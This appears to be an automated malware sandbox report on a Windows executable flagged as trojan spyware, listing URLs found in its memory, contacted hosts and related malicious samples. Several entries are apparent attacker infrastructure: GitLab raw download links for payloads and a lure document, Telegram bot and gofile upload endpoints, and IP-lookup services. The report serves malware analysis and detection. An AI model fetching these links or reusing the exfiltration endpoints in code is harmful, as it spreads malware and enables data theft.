                        https://github.com/mono/linker/issues/1731#U2800.exefalse
                          high
                          https://github.com/mono/linker/issues/2025#U2800.exefalse
                            high
                            https://gitlab.com/-/sandbox/;#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              https://photos.google.com/?tab=wq&pageId=none#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://snowplow.trx.gitlab.net#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.microsoft.c#U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://collector.prd-278964.gl-product-analytics.com#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    http://ip-api.com/json/y#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                      high
                                      https://news.google.com/?tab=wn#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                          high
                                          http://www.google.com:443/(#U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                              high
                                              http://schemas.openxmlfrg/markup-compatibility/2006#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980199503.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1936536459.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.google.com:443/#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342796D000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234279C7000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234279FB000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427A39000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.openxmlf#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980199503.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1936536459.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aka.ms/nativeaot-compatibility#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  high
                                                  http://ip-api.com/json/8.46.123.189#U2800.exe, 00000000.00000002.1979563473.0000023429C52000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1979563473.0000023429C3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/finance?tab=we#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/boti#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                          high
                                                          https://github.com/ericsink/SQLitePCL.rawd#U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            high
                                                            https://www.blogger.com/?tab=wj#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.recaptcha.net/#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://csp.withgoogle.com/csp/gws/other-hp0#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/imghp?hl=en&tab=wi#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/shopping?hl=en&source=og&tab=wf#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro#U2800.exefalse
                                                                        high
                                                                        https://github.com/icsharpcode/SharpZipLib#U2800.exefalse
                                                                          high
                                                                          https://aka.ms/nativeaot-compatibilityy#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                            high
                                                                            https://new-sentry.gitlab.net#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.m%#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://aka.ms/dotnet-illink/com#U2800.exefalse
                                                                                high
                                                                                https://www.youtube.com/#U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.google.com/preferences?hl=en#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.youtube.com/?tab=w1#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.google.com/history/optout?hl=en#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gitlab.com/admin/#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://books.google.com/?hl=en&tab=wp#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://gitlab.com/-/speedscope/index.html#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/wB#U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://aka.ms/nativeaot-compatibilityY#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    high
                                                                                                    https://www.google.com/recaptcha/#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.newtonsoft.com/jsonschema#U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/dotnet/runtime/issues/50820#U2800.exefalse
                                                                                                          high
                                                                                                          https://calendar.google.com/calendar?tab=wc#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/ericsink/SQLitePCL.raw#U2800.exefalse
                                                                                                              high
                                                                                                              http://schemas.openxmlforma#U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://urn.to/r/sds_see12https://urn.to/r/sds_see2#U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/&ec=GAZAAQ#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.sqlite.org/rescode.html#U2800.exefalse
                                                                                                                    high
                                                                                                                    https://api.telegram.org/bot0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/intl/en/about/products?tab=wh#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.mi#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/mono/linker/pull/2125.#U2800.exefalse
                                                                                                                            high
                                                                                                                            https://aka.ms/nativeaot-compatibility0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/mono/linker/issues/1895vUsing#U2800.exefalse
                                                                                                                                high
                                                                                                                                https://csp.withgoogle.com/csp/gws/other-hp#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://system.data.sqlite.org/X#U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.newtonsoft.com/json#U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.micro#U2800.exe, 00000000.00000003.1693296861.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1706934785.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.google.com/document/?usp=docs_alc#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://gitlab.com#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.openxmlformats.#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schema.org/WebPage#U2800.exe, 00000000.00000002.1977175799.0000023427A39000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427C1B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/dotnet/runtime#U2800.exefalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/webhp?tab=ww#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/0#U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://ip-api.com/json/0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://ip-api.com:80/#U2800.exe, 00000000.00000002.1979563473.0000023429C52000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1979563473.0000023429C3F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aka.ms/dotnet-warnings/#U2800.exefalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/dotnet/efcore#U2800.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://maps.google.com/maps?hl=en&tab=wl#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://gitlab.com/assets/#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://gitlab.com:443/#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342785F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/i#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://aka.ms/serializationformat-binary-obsolete#U2800.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://aka.ms/binaryformatter#U2800.exefalse
                                                                                                                                                                            high
                                                                                                                                                                            https://apis.google.com#U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://sentry.gitlab.net#U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://api.ipify.org:443/#U2800.exe, 00000000.00000002.1979563473.0000023429C00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/Y#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.google.com/mobile/?hl=en&tab=wD#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://github.com/JamesNK/Newtonsoft.Json#U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://play.google.com/?hl=en&tab=w8#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s96#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.openxmlformats#U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://api.gofile.io/serversY#U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://drive.google.com/?tab=wo#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://github.com/mono/linker/issues/1416.#U2800.exefalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://lh3.googleusercontent.com/ogw/defa#U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://google.com:443/#U2800.exe, 00000000.00000002.1977175799.00000234278CD000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342783F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427854000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278C1000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427882000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342785F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278A2000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278B5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278D4000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342789B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://github.com/ericsink/SQLitePCL.rawX#U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://api.ipify.org0#U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        142.250.185.206
                                                                                                                                                                                                        google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        142.250.185.228
                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                        ip-api.comUnited States
                                                                                                                                                                                                        53334TUT-ASUSfalse
                                                                                                                                                                                                        172.65.251.78
                                                                                                                                                                                                        gitlab.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        104.26.13.205
                                                                                                                                                                                                        api.ipify.orgUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                        Analysis ID:1590648
                                                                                                                                                                                                        Start date and time:2025-01-14 12:39:08 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 7m 16s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:15
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:#U2800.exe
                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                        Original Sample Name:.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal80.troj.spyw.winEXE@16/21@5/6
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 93%
                                                                                                                                                                                                        • Number of executed functions: 13
                                                                                                                                                                                                        • Number of non-executed functions: 85
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.89.19, 184.28.90.27, 2.22.50.144, 2.22.50.131, 52.111.236.35, 52.111.236.34, 52.111.236.32, 52.111.236.33, 104.208.16.89, 2.21.65.130, 2.21.65.149, 20.190.159.4, 52.149.20.212, 13.107.246.45
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, a767.dspw65.akamai.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        208.95.112.1rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • ip-api.com/json/?fields=61439
                                                                                                                                                                                                        Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                        • ip-api.com/json
